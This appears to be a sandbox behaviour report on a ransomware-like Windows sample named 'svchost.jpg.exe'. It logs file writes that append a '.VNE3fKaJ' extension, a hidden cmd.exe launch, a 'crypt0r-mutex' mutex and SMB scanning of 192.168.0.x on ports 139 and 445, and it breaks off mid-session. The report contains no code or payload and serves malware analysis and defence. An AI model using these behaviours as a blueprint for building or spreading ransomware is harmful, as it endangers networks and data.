Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Write	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png.VNE3fKaJ	size = 128	193	Fn Data
Write	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png.VNE3fKaJ	size = 96	1	Fn Data
Write	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	size = 128	30	Fn Data
Delete	C:\MSOCache\All Users\{91140000-003B-0000-1000-0000000FF1CE}-C\PrjProrWW.xml	-	1	Fn
For performance reasons, the remaining 1113 entries are omitted. The remaining entries can be found in glog.xml.

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\system32\cmd.exe	os_pid = 0x96c, show_window = SW_HIDE		1	Fn

Module (83)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x75a20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Load	api-ms-win-core-string-l1-1-0	base_address = 0x0	1	Fn
Load	api-ms-win-core-datetime-l1-1-1	base_address = 0x0	1	Fn
Load	api-ms-win-core-localization-obsolete-l1-2-0	base_address = 0x0	1	Fn
Load	api-ms-win-core-sysinfo-l1-2-1	base_address = 0x0	1	Fn
Load	api-ms-win-appmodel-runtime-l1-1-2	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75a20000	2	Fn
Get Handle	api-ms-win-core-synch-l1-2-0.dll	base_address = 0x0	1	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe	base_address = 0x280000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe	base_address = 0x280000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe	base_address = 0x280000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\svchost.jpg.exe, size = 261	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	address_out = 0x75a34d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ab40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75a3359f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitOnceExecuteOnce, address_out = 0x75a4d627	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75ab410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75a4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75ab4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75a4ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7789441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x778bc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x778bc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75a4f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x778a05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x778bca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77870b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7792fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x778c1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75aacd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75a4eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleEx, address_out = 0x75a4c78f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandle, address_out = 0x75a5cbfc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimePreciseAsFileTime, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeConditionVariable, address_out = 0x77888456	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeConditionVariable, address_out = 0x778f7de4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WakeAllConditionVariable, address_out = 0x778b409d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableCS, address_out = 0x75ab4b32	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeSRWLock, address_out = 0x77888456	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AcquireSRWLockExclusive, address_out = 0x778829f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TryAcquireSRWLockExclusive, address_out = 0x77894892	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseSRWLockExclusive, address_out = 0x778829ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SleepConditionVariableSRW, address_out = 0x75ab4b74	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWork, address_out = 0x75a4ee45	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SubmitThreadpoolWork, address_out = 0x778c8491	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWork, address_out = 0x778bd8e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ab46b1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ab4751	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x75ab424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x75ac6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x75ac65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x75ab47c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x75ab47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCIDToLocaleName, address_out = 0x75a5ced4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocaleNameToLCID, address_out = 0x75ab4801	1	Fn

System (253)

Operation	Additional Information	Count	Logfile
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Get Time	type = System Time, time = 2019-01-04 10:33:26 (UTC)	1	Fn
Get Time	type = System Time, time = 2019-01-04 10:33:28 (UTC)	1	Fn
Get Time	type = System Time, time = 2019-01-04 10:33:29 (UTC)	249	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = crypt0r-mutex		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Network Behavior

TCP Sessions (246)

Information	Value
Total Data Sent	0 bytes
Total Data Received	0 bytes
Contacted Host Count	246
Contacted Hosts	192.168.0.0:139, 192.168.0.0:445, 192.168.0.1:139, 192.168.0.1:445, 192.168.0.2:139, 192.168.0.2:445, 192.168.0.3:139, 192.168.0.3:445, 192.168.0.4:139, 192.168.0.4:445, 192.168.0.5:139, 192.168.0.5:445, 192.168.0.6:139, 192.168.0.6:445, 192.168.0.7:139, 192.168.0.7:445, 192.168.0.8:445, 192.168.0.8:139, 192.168.0.9:139, 192.168.0.9:445, 192.168.0.10:445, 192.168.0.10:139, 192.168.0.11:139, 192.168.0.11:445, 192.168.0.12:445, 192.168.0.12:139, 192.168.0.13:139, 192.168.0.13:445, 192.168.0.14:445, 192.168.0.14:139, 192.168.0.15:139, 192.168.0.16:445, 192.168.0.16:139, 192.168.0.17:139, 192.168.0.17:445, 192.168.0.18:445, 192.168.0.18:139, 192.168.0.19:139, 192.168.0.19:445, 192.168.0.20:445, 192.168.0.20:139, 192.168.0.21:139, 192.168.0.21:445, 192.168.0.22:445, 192.168.0.22:139, 192.168.0.23:445, 192.168.0.23:139, 192.168.0.24:139, 192.168.0.24:445, 192.168.0.25:445, 192.168.0.25:139, 192.168.0.26:139, 192.168.0.26:445, 192.168.0.27:445, 192.168.0.27:139, 192.168.0.28:139, 192.168.0.28:445, 192.168.0.29:445, 192.168.0.29:139, 192.168.0.30:139, 192.168.0.30:445, 192.168.0.31:445, 192.168.0.31:139, 192.168.0.32:139, 192.168.0.32:445, 192.168.0.33:445, 192.168.0.33:139, 192.168.0.34:445, 192.168.0.34:139, 192.168.0.35:445, 192.168.0.36:139, 192.168.0.36:445, 192.168.0.37:445, 192.168.0.37:139, 192.168.0.38:139, 192.168.0.38:445, 192.168.0.39:445, 192.168.0.40:445, 192.168.0.39:139, 192.168.0.40:139, 192.168.0.41:139, 192.168.0.41:445, 192.168.0.42:445, 192.168.0.42:139, 192.168.0.43:139, 192.168.0.43:445, 192.168.0.44:445, 192.168.0.44:139, 192.168.0.45:139, 192.168.0.45:445, 192.168.0.46:445, 192.168.0.46:139, 192.168.0.47:139, 192.168.0.47:445, 192.168.0.48:139, 192.168.0.48:445, 192.168.0.49:445, 192.168.0.49:139, 192.168.0.50:139, 192.168.0.50:445, 192.168.0.51:445, 192.168.0.51:139, 192.168.0.52:139, 192.168.0.52:445, 192.168.0.53:445, 192.168.0.53:139, 192.168.0.54:445, 192.168.0.54:139, 192.168.0.55:139, 192.168.0.55:445, 192.168.0.56:445, 192.168.0.56:139, 192.168.0.57:139, 192.168.0.57:445, 192.168.0.58:445, 192.168.0.58:139, 192.168.0.59:139, 192.168.0.59:445, 192.168.0.60:445, 192.168.0.60:139, 192.168.0.61:139, 192.168.0.61:445, 192.168.0.62:445, 192.168.0.62:139, 192.168.0.63:139, 192.168.0.63:445, 192.168.0.64:445, 192.168.0.64:139, 192.168.0.65:139, 192.168.0.65:445, 192.168.0.66:445, 192.168.0.66:139, 192.168.0.67:139, 192.168.0.67:445, 192.168.0.68:445, 192.168.0.68:139, 192.168.0.69:139, 192.168.0.69:445, 192.168.0.70:445, 192.168.0.70:139, 192.168.0.71:139, 192.168.0.71:445, 192.168.0.72:445, 192.168.0.72:139, 192.168.0.73:139, 192.168.0.73:445, 192.168.0.74:445, 192.168.0.74:139, 192.168.0.75:139, 192.168.0.75:445, 192.168.0.76:445, 192.168.0.76:139, 192.168.0.77:139, 192.168.0.77:445, 192.168.0.78:445, 192.168.0.78:139, 192.168.0.79:139, 192.168.0.79:445, 192.168.0.80:445, 192.168.0.80:139, 192.168.0.81:139, 192.168.0.81:445, 192.168.0.82:445, 192.168.0.82:139, 192.168.0.83:139, 192.168.0.83:445, 192.168.0.84:445, 192.168.0.84:139, 192.168.0.85:139, 192.168.0.85:445, 192.168.0.86:445, 192.168.0.86:139, 192.168.0.87:139, 192.168.0.87:445, 192.168.0.88:445, 192.168.0.88:139, 192.168.0.89:139, 192.168.0.89:445, 192.168.0.90:445, 192.168.0.90:139, 192.168.0.91:139, 192.168.0.91:445, 192.168.0.92:445, 192.168.0.92:139, 192.168.0.93:139, 192.168.0.93:445, 192.168.0.94:445, 192.168.0.94:139, 192.168.0.95:139, 192.168.0.95:445, 192.168.0.96:445, 192.168.0.96:139, 192.168.0.97:445, 192.168.0.97:139, 192.168.0.98:139, 192.168.0.98:445, 192.168.0.99:445, 192.168.0.99:139, 192.168.0.100:139, 192.168.0.100:445, 192.168.0.101:445, 192.168.0.101:139, 192.168.0.102:139, 192.168.0.102:445, 192.168.0.103:445, 192.168.0.103:139, 192.168.0.104:139, 192.168.0.104:445, 192.168.0.105:445, 192.168.0.105:139, 192.168.0.106:139, 192.168.0.106:445, 192.168.0.107:445, 192.168.0.107:139, 192.168.0.108:139, 192.168.0.108:445, 192.168.0.109:445, 192.168.0.109:139, 192.168.0.110:139, 192.168.0.110:445, 192.168.0.111:445, 192.168.0.111:139, 192.168.0.112:139, 192.168.0.112:445, 192.168.0.113:445, 192.168.0.113:139, 192.168.0.114:139, 192.168.0.114:445, 192.168.0.115:445, 192.168.0.115:139, 192.168.0.116:139, 192.168.0.116:445, 192.168.0.117:445, 192.168.0.117:139, 192.168.0.118:139, 192.168.0.118:445, 192.168.0.119:445, 192.168.0.119:139, 192.168.0.120:139, 192.168.0.120:445, 192.168.0.121:445, 192.168.0.121:139, 192.168.0.122:139, 192.168.0.122:445, 192.168.0.123:445, 192.168.0.123:139

TCP Session #1

Information	Value
Handle	0x35c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.0
Remote Port	139
Local Address	0.0.0.0
Local Port	49159
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.0, remote_port = 139		1	Fn

TCP Session #2

Information	Value
Handle	0x380
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.0
Remote Port	445
Local Address	0.0.0.0
Local Port	49160
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.0, remote_port = 445		1	Fn

TCP Session #3

Information	Value
Handle	0x384
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.1
Remote Port	139
Local Address	0.0.0.0
Local Port	49161
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.1, remote_port = 139		1	Fn

TCP Session #4

Information	Value
Handle	0x344
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.1
Remote Port	445
Local Address	0.0.0.0
Local Port	49162
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.1, remote_port = 445		1	Fn

TCP Session #5

Information	Value
Handle	0x340
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.2
Remote Port	139
Local Address	0.0.0.0
Local Port	49163
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.2, remote_port = 139		1	Fn

TCP Session #6

Information	Value
Handle	0x390
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.2
Remote Port	445
Local Address	0.0.0.0
Local Port	49164
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.2, remote_port = 445		1	Fn

TCP Session #7

Information	Value
Handle	0x388
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.3
Remote Port	139
Local Address	0.0.0.0
Local Port	49165
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.3, remote_port = 139		1	Fn

TCP Session #8

Information	Value
Handle	0x398
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.3
Remote Port	445
Local Address	0.0.0.0
Local Port	49166
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.3, remote_port = 445		1	Fn

TCP Session #9

Information	Value
Handle	0x39c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.4
Remote Port	139
Local Address	0.0.0.0
Local Port	49167
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.4, remote_port = 139		1	Fn

TCP Session #10

Information	Value
Handle	0x3a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.4
Remote Port	445
Local Address	0.0.0.0
Local Port	49168
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.4, remote_port = 445		1	Fn

TCP Session #11

Information	Value
Handle	0x3a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.5
Remote Port	139
Local Address	0.0.0.0
Local Port	49169
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.5, remote_port = 139		1	Fn

TCP Session #12

Information	Value
Handle	0x3a8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.5
Remote Port	445
Local Address	0.0.0.0
Local Port	49170
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.5, remote_port = 445		1	Fn

TCP Session #13

Information	Value
Handle	0x3ac
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.6
Remote Port	139
Local Address	0.0.0.0
Local Port	49171
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.6, remote_port = 139		1	Fn

TCP Session #14

Information	Value
Handle	0x3b0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.6
Remote Port	445
Local Address	0.0.0.0
Local Port	49172
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.6, remote_port = 445		1	Fn

TCP Session #15

Information	Value
Handle	0x38c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.7
Remote Port	139
Local Address	0.0.0.0
Local Port	49173
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.7, remote_port = 139		1	Fn

TCP Session #16

Information	Value
Handle	0x394
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.7
Remote Port	445
Local Address	0.0.0.0
Local Port	49174
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.7, remote_port = 445		1	Fn

TCP Session #17

Information	Value
Handle	0x3c0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.8
Remote Port	445
Local Address	0.0.0.0
Local Port	49175
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.8, remote_port = 445		1	Fn

TCP Session #18

Information	Value
Handle	0x3c4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.8
Remote Port	139
Local Address	0.0.0.0
Local Port	49176
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.8, remote_port = 139		1	Fn

TCP Session #19

Information	Value
Handle	0x3b4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.9
Remote Port	139
Local Address	0.0.0.0
Local Port	49177
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.9, remote_port = 139		1	Fn

TCP Session #20

Information	Value
Handle	0x3c8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.9
Remote Port	445
Local Address	0.0.0.0
Local Port	49178
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.9, remote_port = 445		1	Fn

TCP Session #21

Information	Value
Handle	0x3cc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.10
Remote Port	445
Local Address	0.0.0.0
Local Port	49179
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.10, remote_port = 445		1	Fn

TCP Session #22

Information	Value
Handle	0x3d0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.10
Remote Port	139
Local Address	0.0.0.0
Local Port	49180
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.10, remote_port = 139		1	Fn

TCP Session #23

Information	Value
Handle	0x3d4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
